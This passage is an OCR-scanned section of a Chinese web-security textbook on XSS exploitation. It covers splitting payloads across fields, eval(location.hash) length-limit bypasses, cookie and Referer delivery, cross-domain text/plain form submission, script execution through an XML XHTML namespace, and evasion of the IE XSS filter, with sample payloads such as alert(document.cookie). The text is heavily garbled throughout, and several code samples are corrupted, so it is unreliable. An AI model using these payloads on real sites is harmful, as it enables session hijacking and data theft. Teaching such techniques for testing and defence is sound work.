<input type="hidden" name="page id" value=""><script>/*"> 
<input type="hidden" name="seed" value="*/alert (document .cookie) ; 
cinput type="hidden" name-"mcde" value-"*/</script>"> 


最 终 得 到 的 HTML 完 全 有 效 ， 等 同 于 加 粗 显示 的 部 分 。 其 中 的 源 
代码 块 已 成 为 JavaScript 注 释 (包含 在 /与 */ 之 间 ) ， 因 此 被 浏览 右 忽 
He ° I 就 好 像 它 被 完整 地 插入 到 页 面 的 某 一 
个 位 置 一 样 。 


YV 提示 这 种 将 一 个 攻击 有 效 载荷 分 布 到 几 个 字段 中 的 技巧 ， 
有 时 还 可 用 于 避 开 其 他 类 型 的 防御 过 滤 。 应 用 程序 经 常 对 单独 一 个 
页 面 的 不 同 字 段 执行 不 同 的 数据 确认 与 净化 。 在 前 面 的 示例 中 ， 假 
设 page_id 与 mod 参 数 的 最 大 长 度 为 12 个 字符 。 由 于 这 些 字 段 如 此 地 


短 ， 因 此 应 用 程序 的 开发 者 没有 对 其 实施 任何 XSS 过 滤 。 另 一 方 
E, ，seed 参 数 的 长 度 没 有 限制 ， 因 此 应 用 程序 对 其 实施 严格 的 过 
滤 ， 以 防止 攻击 者 在 其 中 注入 "< 或 > 字符 。 在 这 种 情况 下 ， 尺 管 开 
发 者 实施 了 过 滤 ， 但 攻击 者 不 使 用 任何 被 阻止 的 字符 ， 仍 然 能 够 在 
seed 参 数 中 插入 一 段 任意 长 度 的 脚本 ， 因 为 注入 到 周围 字段 中 的 数 
据 可 以 建立 JavaScript 环 境 。 


第 三 种 在 某 些 情况 下 非常 有 效 的 突破 长 度 限 制 的 技巧 是 ， 将 一 个 
反射 型 XSS 漏 洞 “ 转 换 ?” 成 一 个 基于 DOM 的 漏洞 。 例 如 ， 在 最 初 的 反射 
型 XSS 漏 洞 中 ， 如 果 应 用 程序 对 复制 到 返回 页 面 中 的 message 参 数 设置 
长 度 限制 ， 那 么 束 可 以 注入 以 下 45 字 廊 的 脚本 ， 它 对 当前 URL 中 的 片 
EFE (fragment string) 求 值 。 


<script>eval{({location.hash.slice{(1))}</script> 


通过 在 易于 受到 反射 型 XSS 攻 击 的 参数 中 注入 这 段 脚本 ， 可 以 在 
生成 的 页 面 中 造成 一 个 基于 DOM 的 XSS 漏 洞 ， 从 而 执行 位 于 请 断 字符 
串 中 的 男 一 段 脚 本 ， 它 不 受 应 用 程序 过 滤 的 影响 ， 可 为 任意 长 度 。 例 
如 : 


ht 


»substr{1})</script>#alert[{'long script here ， 


以 下 为 上 述 示例 的 较 短 版 本 ， 此 示例 在 多 数 情况 下 可 以 运行 : 


tp: //mdsec.net/error/5/Error.ashx?messaqge-<seript>eval (location.hash 


在 这 个 版 本 中 ， 整 个 URL 经 过 URL 人 解码 ， 然 后 传递 给 eval 命 令 。 
整个 URL 将 作为 有 效 的 JavaScript 执 行 ， 因 为 http: 协 议 前 级 作为 代码 标 
签 ， 协 议 前 缀 后 面 的 // 则 作为 单行 注释 ，%OA 经 过 URL 人 解码 后 将 变 为 
换行 符 ， 表 示 结 束 注 释 。 

7. 实施 有 效 的 XSS 攻 击 

通常 ， 在 探查 潜在 的 XSS 漏 润 ， 以 了 解 并 避 开 应 用 程序 的 过 滤 机 
WIRT, (REESE TED thas TMi, tite EAA Burp Repeater 之 
类 的 工具 重复 发 送 相同 的 请 求 ， 每 次 对 请 求 进 行 略微 修改 ， 然 后 测试 
这 种 修改 对 响应 的 影响 。 某 些 情况 下 ， 在 以 这 种 方式 创建 概念 验证 攻 
击 后 ， 你 可 能 还 需要 完成 任务 才能 针对 其 他 应 用 程序 用 户 实施 有 效 攻 
击 。 例 如 ， 其 他 用 户 的 请 求 中 的 XSS 进 入 点 (如 cookie 或 Referer 消 息 
A) 可 能 难以 控制 ， 或 者 目标 用 户 可 能 使 用 的 是 内 置 了 防范 反射 型 
XSS 攻 击 功能 的 浏 虎 胡 。 在 这 一 和 中 ， 我 们 将 介绍 你 在 实施 有 效 的 
XSS 攻 击 时 可 能 遇 到 的 各 种 挑战 及 如 何 应 对 这 些 挑 战 。 

@ 将 攻击 扩展 到 其 他 应 用 程序 页 面 

假如 你 所 确定 的 漏洞 位 于 你 不 感 兴趣 的 应 用 程序 区 域 ， 只 影响 未 
经 过 验证 的 用 户 ， 而 其 他 区 域 则 包含 真正 敏感 的 数据 和 你 希望 攻破 的 
功能 。 

通常 ， 在 这 种 情况 下 ， 设 计 一 个 可 以 通过 应 用 程序 的 某 个 区 域 中 
的 XSS 漏 润 传 送 ， 并 且 在 用 户 的 浏览 絮 中 持续 存在 的 攻击 有 效 载 傈 ， 
束 可 以 攻破 同一 个 域 中 的 目标 数据 或 功能 。 

要 实现 上 壕 目 的 ,一 个 简单 的 办 法 是 创建 一 个 包 售 整个 浏 贤 姨 窗 
口 的 iframe， 然 后 在 该 iframe 中 重新 加 载 当 前 页 面 。 在 用 户 浏 贤 站 点 并 
登录 到 通过 验证 的 区 域 时 ， 注 入 的 脚本 将 始终 在 顶层 窗口 中 运行 。 这 
样 ， 你 就 能 够 钓 住 子 iframe 中 的 导航 事件 和 表单 提交 ， 监 视 iframe 中 显 


示 的 所 有 啊 应 内 容 ， 当 然 也 能 够 在 适当 的 时 候 动 持 用 户 的 会 话 。 在 文 
持 HTML5 的 浏览 器 中 ， 当 用 户 在 页 面 间 移动 时 ， 脚 本 甚至 可 以 使 用 
window.history.pushState () 函数 在 地 址 栏 中 设置 适当 的 URL 。 
请 参阅 以 下 URLT 了 解 这 种 攻击 的 一 个 示例 : 
http://blog.kotowicz.net/2010/11/xss-track-how-to-quietly-track- 
whole.html 


号 错误 观点 “我 们 不 用 担心 站 点 中 未 通过 验证 部 分 的 XSS 漏 


洞 ， 攻 击 者 不 可 能 利用 它们 来 劫持 会 话 。” 
因为 两 方面 的 原因 ， 这 种 看 法 并 不 正确 。 首 和 完 ， 应 用 程序 坟 通 
过 验证 部 分 的 XSS 漏 洞 可 被 攻击 者 用 于 直接 攻破 验证 用 户 的 会 话 。 


因此 ， 未 通过 验证 部 分 的 反射 型 XSS 漏 洞 比 通过 验证 部 分 的 这 类 漏 
洞 更 严重 ， 因 为 潜在 受害 者 的 范围 更 广 。 其 次 ， 即 使 用 户 尚 未 通过 
验证 ， 攻 击 首 仍然 可 以 通过 提交 几 个 请 求 ， 在 受害 者 的 浏览 器 中 注 
入 某 种 木马 功能 ， 等 每 用 户 登 录 ， 然 后 支持 用 户 的 会 话 。 如 第 13 章 
eee ee 以 JavaScript 编 写 的 键盘 记 杂 器 来 捕获 
用 户 的 密码 。 


@ ”修改 请 求 方法 

假如 你 确定 的 XSS 漏 洞 使 用 POST 请 求 ， 但 实施 攻击 的 最 便捷 的 方 
法 需要 使 用 GET 请 求 一 一 例如 ， 提 区 一 个 论坛 贴 子 ， 其 中 包含 针对 易 
受 攻击 的 URL 的 IMG 标 签 。 

在 这 种 情况 下 ， 我 们 有 必要 进行 判定 ， 如 果 将 POST 请 求 转换 为 
GET 请 求 ， 应 用 程序 是 否 对 请 求 进行 相同 的 处 理 。 许 多 应 用 程序 接受 
以 上 任何 一 种 请 求 。 

在 Burp Proxy 中 ， 可 以 使 用 上 下 文康 单 中 的 “更 改 请 求 方 
IE” (Change Request Method) 命令 将 任何 请 求 在 GET 与 POST 方法 之 
间 切 换 。 


ee) 错误 观点 “这 个 Xss 漏 洞 无 法 被 利用 。 因 为 攻击 者 无 法 通 
过 GET 请 求实 施 攻 击 。” 


如 采 一 个 反射 型 XSS 漏 洞 只 能 使 用 POST 方法 加 以 利用 ， 应 用 程 


序 仍 然 会 受到 各 种 攻击 传送 机 制 的 影响 ， 包 括 使 用 恶意 第 三 方 Web 
站 点 的 传送 机 制 。 


有 了 时， 把 使 用 GET 方 法 的 攻击 转换 成 使 用 POST 方法 的 攻击 可 能 会 
避 开 某 些 过 滤 。 许 多 应 用 程序 在 整个 应 用 程序 中 执行 某 种 常规 过 滤 ， 
阻止 已 知 的 攻击 字符 串 。 如 果 一 个 应 用 程序 希望 收 到 使 用 GET 方 法 的 
请 求 ， 它 可 能 只 对 URL 查 询 字 符 串 执行 这 种 过 滤 。 将 请 求 转换 为 使 用 
POST 方 法 就 可 以 完全 避 开 这 种 过 滤 。 

@ 通过 cookie 利 用 XSS 漏 洞 

一 些 应 用 程序 包含 反射 型 XSS 漏 洞 ， 攻 击 这 种 漏洞 的 进入 点 在 请 
求 cookie 中 。 在 这 种 情况 下 ， 可 以 通过 各 种 技巧 来 利用 这 种 漏洞 : 

口 和 修改 请 求 一 样 ， 应 用 程序 可 能 允许 你 使 用 与 cookie 同 名 的 
URL 或 主体 参数 来 触发 漏洞 。 

口 如 果 应 用 程序 包含 任何 可 用 于 直接 设置 cookie 值 的 功能 (A 
如 ， 基 于 提交 的 参数 值 设置 cookie 的 首选 项 页 面 ) ， 则 你 可 以 设计 一 
个 跨 站 点 请 求 伪 造 攻 击 ， 在 受害 者 的 浏览 絮 中 设置 所 需 的 cookie。 然 
后 ， 再 诱 使 受害 者 提出 以 下 两 个 请 求 : 其 中 一 个 请 求 用 于 设置 包含 
XSS 有 效 载 集 所 需 的 cookie， 男 一 个 请 求 则 用 于 请 求 以 危险 的 方式 处 理 
cookie 值 的 功能 。 

口 之 前 ， 人 们 已 经 在 浏览 器 扩展 技术 (如 Flash) 中 发 现 各 种 漏 
洞 ， 这 使 攻击 者 可 以 使 用 任意 HTTP 消息 头 提 交 跨 域 请 求 。 当 前 ， 至 少 
有 一 种 此 类 漏洞 广为人知 ， 但 尚未 修复 。 因 此 ， 可 以 利用 浏览 辟 插 件 
中 的 某 个 这 种 类 型 的 漏洞 来 提交 蜂 域 请 求 ， 在 其 中 包含 任意 旨 在 触发 
漏洞 的 cookie 消 息 头 。 

口 如 果 上 述 任 何方 法 都 无 法 成 功 实施 攻击 ， 你 可 以 利用 相同 (或 
相关 ) 域 中 的 任何 其 他 反射 型 XSS 漏 洞 使 用 所 需 值 设置 一 个 永久 性 
cookie， 持 续 对 受害 用 户 进行 攻击 。 

e 通过 Referer 消 息 头 利用 XSS 漏 洞 

一 些 应 用 程序 包含 只 能 通过 Referer 消 息 头 触发 的 XSS 漏 洞 。 利 用 
受 他 们 控制 的 Web 服 务 器 ， 攻 击 者 可 以 相当 轻松 地 利用 这 些 漏洞 。 例 
如 ， 攻 击 者 可 以 诱 使 受害 者 请 求 他 们 的 服务 器 上 的 URL， 该 URL 中 包 
含 针 对 易于 攻击 的 应 用 程序 的 适当 XSS 有 效 载 集 。 然 后 ， 攻 击 者 的 服 
务 器 将 返回 一 个 啊 应 ， 以 请 求 上 述 URL， 而 攻击 者 的 有 效 载 集 就 包含 
在 此 请 求 的 Referer 消 息 涉 中 。 


在 某 些 情况 下 ， 只 有 在 Referer 消 息 头 包含 与 易 受 攻击 的 应 用 程序 
同属 一 个 域 的 URL 时 ，XSS 漏 洞 才 会 触发 。 这 时 ， 可 以 利用 应 用 程序 
中 的 任何 现成 的 重 定 癌 功能 来 实施 攻击 。 为 此 ， 你 需要 构建 一 个 指向 
该 重 定 加 功能 的 URL， 在 其 中 包含 XSS 攻 击 的 有 效 载 何 ， 并 使 其 重 定 
问 到 易于 攻击 的 URL。 这 种 攻击 能 否 成功 ， 取 决 于 该 功能 使 用 的 重 定 
同方 法 ， 以 及 当前 浏 咒 紫 在 进行 上 述 重 定 辣 时 是 否 会 更 新 Referer 消 轧 


e 通过 非 标 准 请 求 和 响应 内 容 利 用 XSS 漏 洞 

目前 ， 有 越 来 越 多 的 复杂 应 用 程序 采用 不 包含 传统 的 请 求 参数 的 
Ajax 请 求 。 而 在 此 前 ， 请 求 通常 包含 XML 和 JSON 格 式 的 数据 ， 或 采 
用 各 种 序列 化 方案 。 因 此 ， 针 对 这 些 请 求 的 啊 应 往往 包含 同 种 或 其 他 
格式 的 数据 ， 而 不 是 HTML 。 

与 这 些 请 求 和 响应 相关 的 服务 器 端 功能 大 多 会 表现 出 类 似 于 XSS 
的 行为 。 正 第 情况 下 ， 应 用 程序 会 按 原样 返回 表明 漏洞 确实 存在 的 请 
求 有 效 载 位 。 

在 这 种 情况 下 ， 仍 然 可 以 利用 这 种 行为 来 实施 XSS 攻 击 。 为 此 ， 
需要 满足 以 下 两 个 条 件 : 

口 你 需要 想 办 法 使 目标 用 户 提 出 所 需 的 跨 域 请 求 ; 
Sg E ge eC 
却 本 。 

满足 这 两 个 条 件 并 不 容易 。 首 和 完 ， 相 天 请 求 通常 由 JavaScript 使 用 
XMLHttpRequest 提 出 〈 请 参阅 第 3 章 了 解 详细 信息 ) 。 默 认 情 况 下 ， 
这 种 方法 并 不 能 用 于 提出 跨 域 请 求 。 虽 然 HTML5 正 在 对 
XMLHttpRequest 进 行 修改 ， 以 便于 站 点 指定 其 他 可 能 与 它们 交互 的 
域 ， 但 是 ， 如 果 你 能 够 找到 允许 第 三 方 交 互 的 目标 ， 就 可 以 采用 更 簿 
单 的 方法 来 攻破 该 目标 〈 请 参阅 第 13 章 了 解 详细 信息 ) 。 

其 次 ， 在 任何 攻击 中 ， 应 用 程序 返回 的 响应 均 由 受害 者 的 浏 贤 器 
直接 处 理 ， 而 不 是 由 定制 脚本 按 原样 处 理 。 因 此 ， 响 应 将 包含 任何 非 
HTML 格 式 的 数据 (通常 使 用 对 应 的 Content-Type 消 息 涉 ) 。 在 这 种 情 
况 下 ， 浏 览 器 会 以 针对 这 种 数据 类 型 《如 果 它 识别 该 类 型 ) 的 方式 正 
E E eet 
R O 

尽管 难以 实现 ， 但 在 某 些 情况 下 我 们 仍然 可 以 满足 这 两 个 条 件 ， 
从 而 利用 类 似 于 XSS 的 行为 来 实施 有 效 攻 击 。 下 面 我 们 将 举例 说 明 如 
何 使 用 XML 数据 格式 来 实施 攻击 。 


V 传送 跨 域 XML 请 求 

使 用 HTML 表 单 (将 enctype 属 性 设置 为 text/plain) 可 以 在 HTTP 请 
中 跨 域 传送 几乎 任何 数据 。 这 将 告诉 浏览 器 按 以 下 方式 处 理 表 

BO: 

口 在 请 求 中 隔行 传送 每 个 参数 ; 

口 使 用 等 号 分 隔 每 个 参数 的 名 称 和 值 (和 平常 一 样 ); 

口 不 对 参数 名 称 或 值 进行 任何 URL 编 码 。 

虽然 某 些 浏览 器 并 不 遵循 这 种 规范 ， 但 当前 版 本 的 Internet 
Explorer、Firefox 和 Opera 都 采用 这 种 规范 。 

上 进行 为 意味 着 ， 只 要 数据 中 至 少 包含 一 个 等 号 ， 你 就 可 以 在 消 
奶 主 体 中 传送 任意 数据 。 为 此 ， 你 需要 将 数据 分 隅 成 两 块 ， 等 号 前 一 
块 ， 等 号 后 一 块 。 然 后 ， 将 第 一 块 数据 放 在 参数 名 称 中 ， 将 第 二 块 数 
据 放 在 参数 值 中 。 这 样 ， 浏 览 右 在 构建 请 求 时 ， 它 会 传送 以 等 号 分 隔 
的 两 块 数 据 ， 因 而 实际 上 构建 了 所 需 的 数据 。 

由 于 XML 在 起 始 XML 标 签 的 version 属 性 中 始终 至 少 包 含 一 个 等 
号 ， 因此， 我 们 可 以 在 消息 主体 中 使 用 这 种 技巧 跨 域 传送 任意 数据 。 
例如 ， 如 果 所 需 的 XML 如 下 所 示 : 


<?xml version="1.0"?><data><param>foo</param></data> 
则 可 以 使 用 以 下 表单 发 送 这 些 数据 : 
<form enctype="text/plain" action="http://wahh-app.com/ vuln.php" 


method="POST"> 
<input type="hidden” name='<?xml version' 
value~'"1.0"?><data><param>foo</param></data>'> 


form><script>document. forms[0].submit();</seript> 


要 在 param 参 数 的 值 中 包含 常用 的 攻击 字符 ， 如 标签 尖 插 号 ， 你 需 
要 在 XML 请 求 中 对 这 些 字符 进行 HTML 编 码 。 因 此 ， 在 生成 该 请 求 的 
HTML 表 单 中 ， 你 需要 对 它们 进行 双重 HTML 编 码 。 


¥ ”提示 只 要 你 能 够 将 等 号 合并 到 请 求 中 的 某 个 位 置 ， 就 可 
以 使 用 这 种 技巧 跨 域 提交 几乎 包含 任何 类 型 的 内 容 (如 JSON 编 码 的 
数据 和 序列 化 二 进 制 对 象 ) 的 请 求 。 通 常 ， 通 过 修改 请 求 中 可 以 包 


含 等 号 字符 的 目 由 格式 的 文本 字段 即 可 达到 这 一 目的 。 例 如 ， 在 下 
面 的 JSON 数 据 中 ， 注 释 字 段 被 用 于 注入 所 需 的 等 号 字符 : 


在 使 用 这 种 技巧 时 ， 唯 一 需要 注意 的 地 方 是 ， 生 成 的 请 求 将 包含 
以 下 消息 头 : 


Content-Type: text/plain 


正常 情况 下 ， 根 据 生成 请 求 的 具体 方式 ， 最 初 的 请 求 本 应 包含 一 
个 不 同 的 Content-Type 消 息 头 。 如 果 应 用 程序 接受 提供 的 Content-Type 
消息 头 并 正常 处 理 消 轧 主体 ， 则 在 设计 有 效 的 XSS 攻 击 时 束 可 以 使 用 
这 种 技巧 。 如 果 由 于 Content-Type 消 息 头 已 修改 ， 应 用 程序 无 法 正常 处 
o 则 可 能 没有 办 法 跨 域 传送 适当 的 请 求 来 触发 类 似 于 XSS 的 行 


¥ BR 如 果 在 包含 非 标准 内 容 的 请 求 中 确定 了 类 似 于 XSS 的 


行为 ， 首 移 应 该 快速 确定 ， 在 将 Content-Type 消 息 头 更 改 为 texyplain 
后 ， 这 种 行为 是 否 仍然 存在 。 如 果 这 种 行为 不 再 存在 ， 则 你 不 必 付 
出 任何 其 他 努力 来 尝试 设计 有 效 的 XSS 攻 击 。 


vV 从 XML 员 应 中 执行 JavaScript 

在 尝试 利用 非 标 准 内 容 中 的 类 似 于 XSS 的 行为 时 ， 你 需要 克服 的 
第 二 个 障碍 是 找到 一 种 操纵 响应 的 方法 ， 使 其 在 由 浏览 怖 直接 处 理 时 
能 够 执行 你 的 脚本 。 如 果 响 应 中 包含 错误 的 Content-Type 消 息 头 ， 或 根 
本 不 包含 Content-Type 消 息 头 ， 或 者 如 果 输 入 在 响应 主体 的 开始 部 分 束 
已 反射 ， 则 可 以 轻松 克服 这 种 障碍 。 

但 是 ， 响 应 通常 都 包含 准确 描述 应 用 程序 返回 的 数据 类 型 的 
Content-Type 消 息 头 。 此 外 ， 你 的 输入 大 多 是 在 响应 的 中 间 部 分 反射 。 
同时 ， 在 此 位 置 之 前 和 之 后 的 响应 内 容 包含 的 数据 遵循 指定 内 容 类 型 
的 相关 规范 。 不 同 浏览 器 解析 内 容 的 方式 各 不 相同 。 一 些 浏览 器 完全 
信任 Content-Type 消 息 头 ， 一 些 浏览 万 则 会 检查 内 容 本 号 ， 并 在 具体 的 


类 型 有 所 不 同时 黎 关 指定 的 类 型 。 但 是 ， 在 这 种 情况 下 ， 无 论 浏 贤 需 
如 何 处 理 内 容 ， 它 都 不 大 可 能 将 啊 应 作为 HTML 处 理 。 

如 有 果 可 以 构建 能 够 成 功 执行 脚本 的 啊 应 ， 这 往往 需要 利用 所 注入 
的 内 容 类 型 的 特定 语法 特性 。 科 好， 对 于 XML 而 言 ， 你 可 以 使 用 XML 
标记 定义 一 个 映射 为 XHTML 的 新 命名 空间 ， 并 使 浏览 絮 将 该 命名 空 
间 解 析 为 HTML， 从 而 达到 执行 脚本 的 目的 。 例 如 ， 在 Firefox 处 理 以 
下 响应 时 ， 注 入 的 脚本 将 得 以 执行 : 


HITP/1.1 200 Ok 
Content-Type: text/xml 
Content-Length: 1098 


<xml> 


<data> 


<a xumlns:a='http://www.w3.org/1999/xhtml1'> 
<a:body onload='alert(1)'/></a> 


</data> 


</xml> 


如 上 所 述 ， 如 果 啊 应 由 浏览 硕 直 接 处 理 ， 而 不 是 由 通常 处 理 啊 应 
的 原始 应 用 程序 组 件 处 理 时 ， 此 攻击 将 取得 成 功 。 

@ 攻击 浏览 器 XSS 过 滤器 

在 利用 几乎 任何 反射 型 XSS 漏 洞 时 总 是 会 遇 到 一 个 障碍 ， 即 各 种 
浏 硕 怖 功能 都 针对 XSS 攻 击 为 用 户 提供 了 保护 。Internet Explorer} w 
髓 默认 包含 一 个 XSS 过 滤 硕 ， 其 他 一 些 浏览 器 也 通过 插件 的 形式 提供 
类 似 的 功能 。 这 些 过 滤器 的 工作 方式 基本 类 似 ， 它 们 被 动 监视 请 求 和 
响应 ， 并 使 用 各 种 规则 来 确定 正在 进行 的 潜在 XSS 攻 击 ， 一 旦 确定 潜 
在 攻击 ， 束 修改 响应 的 某 些 部 分 来 阻止 这 些 攻击 。 

如 前 所 述 ， 如 果 可 以 通过 任何 广泛 使 用 的 浏览 右 来 利用 XSS 条 
件 ， 我 们 束 应 将 这 些 条 件 视 为 漏洞。 而 且 ， 菜 些 浏览 如 提供 XSS 过 小 
器 并 不 意味 着 不 需要 修复 XSS 漏 洞 。 在 某 些 现实 情况 下 ， 攻 击 者 可 能 
恰恰 需要 通过 包含 XSS 过 滤 需 的 浏 斋 天 来 利用 某 个 漏洞 。 此 外 ， 用 于 


避 开 XSS 过 滤 需 的 方法 本 喘 也 值得 我 们 关注 。 在 某 些 情况 下 ， 我 们 甚 
至 可 以 利用 这 些 方法 来 实施 通过 别 的 方法 无 法 实施 的 其 他 攻击 。 

在 这 一 六 中 ， 我 们 将 介绍 Internet Explorer 的 XSS 过 滤器 。 目 前 ， 
它 是 最 成 熟 及 应 用 最 广泛 的 过 滤器 。 

IE XSS 过 滤 磺 的 核心 功能 如 下 。 

口 检查 跨 域 请 求 中 的 每 一 个 参数 值 ， 以 确定 注入 JavaScript 的 可 能 
尝试 。 它 会 根据 一 个 常见 攻击 字符 串 的 基于 正则 表达 式 的 黑 名 单 来 检 
查 这 些 值 ， 从 而 完成 这 一 任务 。 

B ee ee 则 检查 响应 ， 看 其 中 是 否 包 含 相 
同 的 值 。 

口 如 果 啊 应 中 出 现 该 值 ， 则 会 对 响应 进行 净化 ， 以 防止 执行 任何 
脚本 。 例 如 ， 它 会 将 <script> 修 改 为 <sc#ipt>。 

天 于 IE XSS 过 滤 硕 ， 需 要 指出 的 第 一 个 问题 是 : 大 体 而 言 ， 它 能 
人 够 有 效 阻 止 利用 XSS 漏 洞 的 标准 攻击 ， 从 而 为 任何 尝试 实施 这 类 攻击 
的 攻击 者 设置 了 很 大 的 障碍 。 这 意味 着 ， 需 要 通过 某 些 特定 的 方法 才 
能 避 开 这 种 过 滤器 。 此 外 ， 还 可 以 利用 这 种 过 滤 絮 的 工作 机 制 来 实施 
通过 别 的 方法 无 法 实施 的 其 他 攻击 。 

首先 ， 利 用 这 种 过 滤器 的 核心 功能 ， 我 们 可 以 找到 一 些 避 开 该 过 
滤 絮 的 方法 。 

口 该 过 滤器 仅 检 查 参 数值 ， 而 不 检查 参数 名 称 。 一 些 应 用 程序 易 
于 受到 针对 参数 名 称 的 攻击 ， 如 在 响应 中 回 显 请 求 的 整个 URL 或 整个 
查询 字符 串 。 该 过 滤器 无 法 阻止 这 类 攻击 。 

口 该 过 滤器 单独 检查 每 个 参数 值 。 但 是 ， 如 果 在 同一 个 啊 应 中 反 
射 多 个 参数 ， 就 可 以 将 攻击 从 一 个 参数 传递 到 另 一 个 参数 (如 用 于 突 
破 长 度 限 制 的 技巧 中 所 述 ) 。 如 果 可 以 将 XSS 有 效 载 答 分 割 成 几 块 ， 
则 其 中 任何 一 块 都 不 会 与 受阻 止 的 表达 式 黑 名 单 相 匹配 ， 这 样 ， 过 渡 
句 将 无 法 阻止 攻击 。 

口 由 于 性 能 原因 ， 该 过 滤 絮 仅 检 查 跨 域 请 求 。 因此， 如 果 攻 击 者 
能 够 使 用 户 向 XSS URL 提 出 “本 地 ”请求 ， 过 滤 妖 将 无 法 阻止 这 种 攻 
击 。 通 常 ， 如 有 果 应 用 程序 包含 任何 行为 ， 人 允许 攻 击 者 在 由 其 他 用 户 查 
看 的 页 面 中 注入 任意 链接 ， 这 种 攻击 即 成 为 可 能 (虽然 这 本 身 也 属于 
反射 型 攻击 ， 但 XSS 过 滤 需 仅 党 试 阳 止 注入 的 脚本 ， 而 不 是 注入 的 链 
接 ) 。 在 这 种 情况 下 ， 攻 击 者 需要 完成 两 个 步骤 : 在 用 户 的 页 面 中 注 
入 恶意 链接 ;用户 单 击 链接 并 收 到 XSS 有 效 载 傈 。 

其 次 ， 在 某 些 情况 下 ， 可 以 利用 浏览 器 和 服务 絮 的 特殊 行为 来 避 
开 XSS 过 滤器 。 


口 如 你 所 见 ， 浏 览 器 在 处 理 HTML 时 接受 各 种 类 型 的 异常 字符 和 
语法 。 例 如 ，IE 本 身 就 接受 NULL 字 节 。 有 时 ， 攻 击 者 可 以 利用 下 的 
这 种 古怪 行为 来 避 开 它 的 XSS 过 滤器 。 

口 如 第 10 章 所 述 ， 在 请 求 包含 多 个 同名 参数 时 ， 应 用 程序 服务 妖 
的 行为 各 不 相同 。 在 某 些 情况 下 ， 它 们 会 串联 收 到 的 所 有 值 。 例 如 ， 
在 ASPNET 中 ， 如 果 碍 询 字 符 串 包含 : 


pi=foospl-bar 


传递 给 应 用 程序 的 参数 
pl 的 值 为 : 


pl=foo,bar 


与 之 相反 ， 即 使 参数 的 名 称 相 同 ， 但 IE XSS 过 滤 右 仍然 会 单独 处 
理 每 个 参数 。 这 种 行为 差异 使 得 攻击 者 能 够 轻松 在 儿 个 相同 名 称 的 “不 
同 ” 请 求 参数 之 间 传 递 XSS 有 效 载 何 ， 从 而 避 开 针对 每 个 单独 的 值 的 黑 
名 单 过 滤 (因为 服务 器 已 将 它们 串联 起 来 ; 。 


尝试 访问 


当前 ， 以 下 XSS 攻 击 可 成 功 避 开 IE XSSw ear: 
http://mdsec.net/error/5/Error.ashx?message= 
<scr/600ipt 4 208amessage=> alert('xss')</script> 


再 次 ， 通 过 利用 该 过 滤器 净化 应 用 程序 啊 应 中 的 脚本 代码 的 方 
式 ， 可 以 实施 通过 其 他 方法 无 法 实施 的 攻击 。 之 所 以 会 出 现 这 种 情 
况 ， 主 要 是 因为 该 过 滤 右 以 被 动 方 式 运行 ， 仅 寻找 类 似 脚 本 的 输入 与 
类 似 脚 本 的 输出 之 间 的 关联 。 它 无 法 对 应 用 程序 进行 交互 性 探查 ， 以 
确定 给 定 输入 是 否 与 给 定 输出 相关 联 。 因 此 ， 攻 击 者 可 以 利用 该 过 滤 
亏 净 化 在 啊 应 中 出 现 的 应 用 程序 目 身 的 脚本 代码 。 如 采 攻 击 者 在 请 求 
参数 值 中 包含 一 部 分 现 有 脚本 ，IE XSS 过 滤器 在 请 求 和 响应 中 发 现 相 
同 的 脚本 代码 ， 它 就 会 修改 啊 应 中 的 脚本 ， 以 阻止 该 脚本 执行 。 

事实 证 明 ， 在 某 些 情况 下 ， 净 化 现 有 脚本 将 改变 包含 用 户 输入 反 
味 的 啊 应 的 后 续 部 分 的 语法 情境 。 这 种 情境 的 改变 意味 着 应 用 程序 目 
号 对 反射 型 输入 的 过 减 不 充分 。 因 此 ， 攻 击 者 可 以 利用 用 户 输入 反射 
来 实施 XSS 攻 击 (如 有 果 IE XSS 过 滤器 没有 修改 响应 ， 这 种 攻击 将 无 法 
RDJ) 。 但 是 ， 能 够 实施 这 类 攻击 的 情形 通常 与 不 常用 的 功能 或 早期 
版 本 的 EXSS 过 滤器 中 披露 的 缺陷 (已 修复 ) 有 关 。 

更 重要 的 是 ， 由 于 攻击 者 可 以 选择 性 地 净化 应 用 程序 目 身 的 脚本 
人 代码， 因此， 他们 可 以 利用 这 种 "能力 ”， 通 过 破坏 应 用 程序 安全 相关 
的 控制 机 制 来 实施 全 然 不 同 的 攻击 。 一 个 篆 见 的 示例 是 删除 防御 性 的 
framebusting 代 码 〈 请 参阅 第 13 章 了 解 详细 信息 ) ， 但 其 他 大 量 示例 主 
要 与 在 客户 端 执行 关键 的 安全 防御 任务 的 应 用 程序 专用 代码 有 关 。 


确定 保存 型 XSS 漏 洞 的 过 程 与 前 面 挡 述 的 确定 反射 型 XSS 漏 洞 的 
过 程 有 很 多 相似 之 处 ， 都 包括 在 应 用 程序 的 每 一 个 进入 点 提交 一 个 特 
殊 字 符 串 。 但 是 ， 这 两 个 过 程 之 间 也 存在 一 些 重 要 的 区 别 。 在 进行 测 
试 时 ， 必 须 记 住 这 些 区 别 ， 以 确定 尽 可 能 多 的 漏洞 。 


渗透 测试 步骤 


(1) 向 应 用 程序 中 的 每 一 个 可 能 的 位 置 提交 一 个 特殊 的 字符 
串 后 ， 必 须 反 复 检查 应 用 程序 的 全 部 内 容 与 功能 ， 确 定 这 个 字符 串 
在 浏览 器 中 显示 的 任何 情况 。 在 某 个 位 置 ( 例 如， 个 人 信息 页 面 的 
姓名 字段 ) 输入 用 户 控制 的 数据 ， 这 个 数据 可 能 会 在 应 用 程序 的 许 
多 不 同位 置 显示 《例如 ， 用 户主 页 上 、 注 册 用 户 列表 中 、 任 务 等 工 
作 流程 项 目 中 、 其 他 用 户 的 联系 列表 中 、 用 户 提交 的 消息 或 问题 
中 、 应 用 程序 日 志 中 等 ) 。 应 用 程序 可 能 对 每 个 出 现 的 字符 串 实施 
了 不 同 的 保护 性 过 滤 ， 因 此 需要 对 它们 进行 单独 分 析 。 

(2) 如 有 可 能 ， 应 检查 管理 员 能 够 访问 的 所 有 应 用 程序 区 
域 ， 确定 其 中 是 否 存 在 任何 可 被 非 管理 用 户 控 制 的 数据 。 例 如 ， 应 
用 程序 一 般 允 许 管理 员 在 浏览 大 中 检查 日 志文 件 。 这 种 类 型 的 功能 
极 有 可 能 包含 XSS 调 洞 ， 攻 击 者 通过 生成 人 有 恶意 HITML 的 日 志 记 
录 即 可 对 其 加 以 利用 。 

(3) 在 向 应 用 程序 中 的 每 个 位 置 提交 一 个 测试 字符 串 时 ， 并 
不 总 是 把 它 作 为 每 个 页 面 的 每 一 个 参数 这 样 滑 单 。 在 保存 被 提交 的 
